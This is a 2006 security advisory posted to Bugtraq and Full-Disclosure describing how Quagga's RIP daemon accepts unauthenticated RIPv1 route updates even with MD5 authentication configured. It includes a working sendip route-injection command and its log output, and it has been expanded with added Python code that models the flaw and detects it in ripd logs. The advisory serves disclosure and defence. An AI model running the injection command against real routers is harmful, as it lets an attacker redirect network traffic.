Message-ID: <44580900.8090700@arhont.com>
Date: Wed, 03 May 2006 02:36:00 +0100
From: "Konstantin V. Gavrilenko" <mlists@...ont.com>
To: bugtraq@...urityfocus.com,  full-disclosure@...ts.grok.org.uk
Cc: maintainers@...gga.net, paul@...bi.ie
Subject: Quagga RIPD unauthenticated route injection


Arhont Ltd - Information Security

Advisory by:	Konstantin V. Gavrilenko (http://www.arhont.com)
Arhont ref:	arh200604-2
Advisory:	Quagga RIPD unauthenticated route injection
Class:		design bug?
Version:	Tested on Quagga suite v0.98.5 v0.99.3 (Gentoo, 2.6.15)
Model Specific:	Other versions might have the same bug


DETAILS
It is possible to inject a custom malicious route into the Quagga RIP
daemon (ripd) using a RIPv1 RESPONSE packet, even when Quagga has been
configured to use MD5 authentication.

The prerequisite for the attack is that no specific protocol version is
set in the router rip configuration. In that case Quagga accepts
authenticated RIPv2 packets and also RIPv1 packets, which have no
authentication mechanism at all.

Configuration of ripd:
key chain dmz
 key 1
  key-string secret
!
interface eth0
 ip rip authentication mode md5 auth-length old-ripd
 ip rip authentication key-chain dmz
!
router rip
 redistribute static
 network eth0

arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p
rip -rv 1 -rc 2  -re 2:0:192.168.36.0:255.255.255.0:0.0.0.0:1 192.168.69.100
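The packet-level view of the gap described above, as an added example (not code from the advisory or from Quagga): a small RIP datagram parser, a model of the acceptance logic the advisory describes (authentication is only checked on RIPv2, so a RIPv1 RESPONSE passes whenever version 1 is still accepted), and a hardened variant that refuses RIPv1 on any interface that requires authentication. The two sample packets are constructed here; the accepted-version set stands in for ripd's "version" / "ip rip receive version" setting, and both acceptance functions are assumptions drawn from the advisory text, not Quagga's actual code. The RIPv2 sample carries a keyed-MD5 header entry but a placeholder digest; digest verification (RFC 2082) is out of scope.

```python
import struct
from ipaddress import IPv4Address

# RIP header: command (1=REQUEST, 2=RESPONSE), version, two zero bytes; then 20-byte entries.
RIP_REQUEST, RIP_RESPONSE = 1, 2
AF_INET = 2        # address family of an ordinary route entry
AF_AUTH = 0xFFFF   # RIPv2 authentication entry (RFC 2453 / RFC 2082)
AUTH_MD5 = 3       # keyed-MD5 authentication type
ENTRY_LEN = 20


def parse_rip(data: bytes) -> dict:
    """Split a RIP datagram into its header fields and raw 20-byte entries."""
    if len(data) < 4 or (len(data) - 4) % ENTRY_LEN:
        raise ValueError("malformed RIP packet length %d" % len(data))
    command, version, _zero = struct.unpack("!BBH", data[:4])
    entries = []
    for off in range(4, len(data), ENTRY_LEN):
        family, tag = struct.unpack("!HH", data[off:off + 4])
        entries.append({"family": family, "tag": tag, "body": data[off + 4:off + ENTRY_LEN]})
    return {"command": command, "version": version, "entries": entries}


def decode_routes(pkt: dict) -> list:
    """Return (prefix, mask, next_hop, metric) for every AF_INET entry."""
    routes = []
    for e in pkt["entries"]:
        if e["family"] != AF_INET:
            continue
        ip, mask, nh, metric = struct.unpack("!4s4s4sI", e["body"])
        routes.append((str(IPv4Address(ip)), str(IPv4Address(mask)),
                       str(IPv4Address(nh)), metric))
    return routes


def has_md5_auth(pkt: dict) -> bool:
    """RIPv2 carries its authentication header in the first entry; RIPv1 has no such field."""
    first = pkt["entries"][0] if pkt["entries"] else None
    return first is not None and first["family"] == AF_AUTH and first["tag"] == AUTH_MD5


def ripd_accepts(pkt: dict, auth_mode, receive_versions):
    """Assumed model of the vulnerable logic: the MD5 check applies to RIPv2 only, so a
    RIPv1 RESPONSE is accepted whenever version 1 is still in the accepted set."""
    if pkt["command"] != RIP_RESPONSE:
        return False, "not a RESPONSE"
    if pkt["version"] not in receive_versions:
        return False, "RIP version %d not accepted on this interface" % pkt["version"]
    if pkt["version"] == 2 and auth_mode == "md5" and not has_md5_auth(pkt):
        return False, "RIPv2 packet without MD5 authentication"
    return True, "accepted"


def hardened_accepts(pkt: dict, auth_mode, receive_versions):
    """Assumed hardened variant: an interface that requires authentication never accepts
    RIPv1, because a RIPv1 packet cannot carry an authentication entry at all."""
    if auth_mode is not None and pkt["version"] == 1:
        return False, "RIPv1 cannot be authenticated; rejected on an authenticated interface"
    return ripd_accepts(pkt, auth_mode, receive_versions)


def _entry(family: int, tag: int, body: bytes) -> bytes:
    return struct.pack("!HH", family, tag) + body


# Constructed sample: a RIPv1 RESPONSE with one route, 192.168.36.0 metric 1, 24 bytes
# long like the packet in the advisory's ripd log. RIPv1 entries carry no mask or next hop.
V1_RESPONSE = struct.pack("!BBH", RIP_RESPONSE, 1, 0) + _entry(
    AF_INET, 0, IPv4Address("192.168.36.0").packed + bytes(8) + struct.pack("!I", 1))

# Constructed sample: a RIPv2 RESPONSE with a keyed-MD5 header entry (packet length, key id,
# auth data length, sequence number, 8 zero bytes), the same route with an explicit mask,
# and the 16-byte digest trailer (placeholder digest, not computed here).
_V2_LEN = 4 + 2 * ENTRY_LEN
V2_RESPONSE = (
    struct.pack("!BBH", RIP_RESPONSE, 2, 0)
    + _entry(AF_AUTH, AUTH_MD5, struct.pack("!HBBI", _V2_LEN, 1, 16, 1) + bytes(8))
    + _entry(AF_INET, 0, IPv4Address("192.168.36.0").packed
             + IPv4Address("255.255.255.0").packed + bytes(4) + struct.pack("!I", 1))
    + _entry(AF_AUTH, 1, bytes(16))
)

if __name__ == "__main__":
    for name, raw in (("RIPv1", V1_RESPONSE), ("RIPv2+MD5", V2_RESPONSE)):
        pkt = parse_rip(raw)
        print(name, decode_routes(pkt))
        print("  no 'version' configured:", ripd_accepts(pkt, "md5", {1, 2}))
        print("  'version 2' configured: ", ripd_accepts(pkt, "md5", {2}))
        print("  hardened check:         ", hardened_accepts(pkt, "md5", {1, 2}))
```

With the default accepted-version set {1, 2} the unauthenticated RIPv1 packet is accepted by the modelled logic and its route decoded, which is the case in the advisory; pinning the accepted set to {2} (the missing "version" setting the advisory points at) or applying the hardened check rejects it, while the authenticated RIPv2 packet passes both.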

RIPD LOG
2006/05/02 16:06:45 RIP: RECV packet from 192.168.69.102 port 520 on eth0
2006/05/02 16:06:45 RIP: RECV RESPONSE version 1 packet size 24
2006/05/02 16:06:45 RIP:   192.168.36.0 family 2 tag 0 metric 1
2006/05/02 16:06:45 RIP: Resultant route 192.168.36.0
2006/05/02 16:06:45 RIP: Resultant mask 255.255.255.0
2006/05/02 16:06:45 RIP: triggered update!
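The log above is what a defender has to work with, so here is an added example (not part of the advisory) of a detector over ripd debug lines in that format: it pairs each "RECV packet from" line with the following "RECV RESPONSE version N" line and raises an alert when a version 1 RESPONSE arrives on an interface that is configured for MD5 authentication, recording the routes it carried, whether the sender is a known neighbour, and whether a triggered update followed. The sample log is the six lines quoted above plus a constructed authenticated RIPv2 exchange from a second host; the interface and neighbour sets are assumed to come from the operator's own ripd configuration.

```python
import re

# Constructed sample: the advisory's ripd log lines, then a constructed RIPv2 exchange.
SAMPLE_LOG = """\
2006/05/02 16:06:45 RIP: RECV packet from 192.168.69.102 port 520 on eth0
2006/05/02 16:06:45 RIP: RECV RESPONSE version 1 packet size 24
2006/05/02 16:06:45 RIP:   192.168.36.0 family 2 tag 0 metric 1
2006/05/02 16:06:45 RIP: Resultant route 192.168.36.0
2006/05/02 16:06:45 RIP: Resultant mask 255.255.255.0
2006/05/02 16:06:45 RIP: triggered update!
2006/05/02 16:07:15 RIP: RECV packet from 192.168.69.101 port 520 on eth0
2006/05/02 16:07:15 RIP: RECV RESPONSE version 2 packet size 64
"""

RECV_PACKET = re.compile(
    r"^(?P<ts>\S+ \S+) RIP: RECV packet from (?P<src>\S+) port (?P<port>\d+) on (?P<iface>\S+)$")
RECV_CMD = re.compile(
    r"^(?P<ts>\S+ \S+) RIP: RECV (?P<cmd>REQUEST|RESPONSE) version (?P<ver>\d) packet size (?P<size>\d+)$")
ROUTE_LINE = re.compile(
    r"^\S+ \S+ RIP:\s+(?P<prefix>\d+\.\d+\.\d+\.\d+) family \d+ tag \d+ metric (?P<metric>\d+)$")


def detect_unauth_v1(log_text: str, authenticated_ifaces, known_neighbours=frozenset()) -> list:
    """Return one alert dict per RIPv1 RESPONSE received on an MD5-authenticated interface."""
    alerts = []
    ctx = None      # the most recent "RECV packet from ..." line (source, port, interface)
    current = None  # the alert being filled in while its route lines follow
    for line in log_text.splitlines():
        m = RECV_PACKET.match(line)
        if m:
            ctx, current = m.groupdict(), None
            continue
        m = RECV_CMD.match(line)
        if m and ctx:
            if m["cmd"] == "RESPONSE" and m["ver"] == "1" and ctx["iface"] in authenticated_ifaces:
                current = {
                    "time": m["ts"], "src": ctx["src"], "iface": ctx["iface"],
                    "size": int(m["size"]), "routes": [],
                    "known_neighbour": ctx["src"] in known_neighbours,
                    "triggered_update": False,
                }
                alerts.append(current)
            continue
        if current is None:
            continue
        m = ROUTE_LINE.match(line)
        if m:
            current["routes"].append((m["prefix"], int(m["metric"])))
        elif line.endswith("triggered update!"):
            # ripd installed the route and re-advertised it: the injection took effect.
            current["triggered_update"] = True
    return alerts


if __name__ == "__main__":
    for a in detect_unauth_v1(SAMPLE_LOG, {"eth0"}, {"192.168.69.101"}):
        print("ALERT %(time)s: unauthenticated RIPv1 RESPONSE from %(src)s on %(iface)s, "
              "routes=%(routes)s known_neighbour=%(known_neighbour)s "
              "triggered_update=%(triggered_update)s" % a)
```

Only the first exchange produces an alert: a version 1 RESPONSE on eth0 from a host that is not a configured neighbour, carrying 192.168.36.0 with metric 1 and followed by a triggered update. The RIPv2 exchange from 192.168.69.101 is left alone, and the same log checked against an interface without MD5 authentication yields nothing.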


RISK FACTOR: Medium


WORKAROUNDS: Apply the patch for ripd, or firewall access to the ripd
daemon on a need-to-access basis.


COMMUNICATION HISTORY:
Issue discovered:	  10/04/2006
quagga notified:	  24/04/2006
Public disclosure:	  03/05/2006

ADDITIONAL INFORMATION:
*According to Arhont Ltd. policy, all vulnerabilities and security issues
found will be reported to the manufacturer at least 7 days before they
are released to the public domain (such as CERT and BUGTRAQ).

If you would like more information about this issue, please do not
hesitate to contact the Arhont team at info@...ont.com


-- 
Respectfully,
Konstantin V. Gavrilenko

Managing Director
Arhont Ltd - Information Security

web:    http://www.arhont.com
	http://www.wi-foo.com
e-mail: k.gavrilenko@...ont.com

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com
